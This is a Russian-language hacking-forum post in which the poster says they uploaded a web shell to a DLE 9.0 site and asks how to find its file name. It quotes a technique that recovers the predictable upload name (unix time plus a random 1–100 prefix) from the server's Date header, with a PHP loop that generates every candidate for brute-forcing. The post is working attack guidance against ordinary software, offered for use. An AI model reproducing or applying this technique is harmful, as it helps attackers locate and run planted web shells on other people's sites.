Всем привет, мужики подскажите пожалуйста. Залил шелла с юзерскими правами, доступами в админку и тд. нету. Каким образом мне можно узнать название файла? DLE 9.0 Как эту дыру заюзать я хз. Получение названия загруженного файла (шелла, к примеру) через форму заливки Зависимость: Права админа или журналиста с разрешением аливать файлы чреез админку Файл: /admin.php?mod=files Кусок кода: Code: $file_prefix = time() + rand( 1, 100 ); $file_prefix .= "_"; @copy( $imageurl, ROOT_DIR . "/uploads/files/" . $file_prefix . $image_name ) Ага, пишется: unixtime+{случайное число от 1 до 100}_названиефайлачтомывыгрузили Отсылаем файл, снифаем, что вернул сервер: Date: Mon, 14 Jun 2010 07:35:04 GMT делаем себе Code: for($i=0; $i<=100; $i++) { $name=strtotime("Mon, 14 Jun 2010 07:35:04 GMT")+$i; echo $name."<br>"; } Генерируем все возможные нвазвания нашего файла, потом просто перебираем их.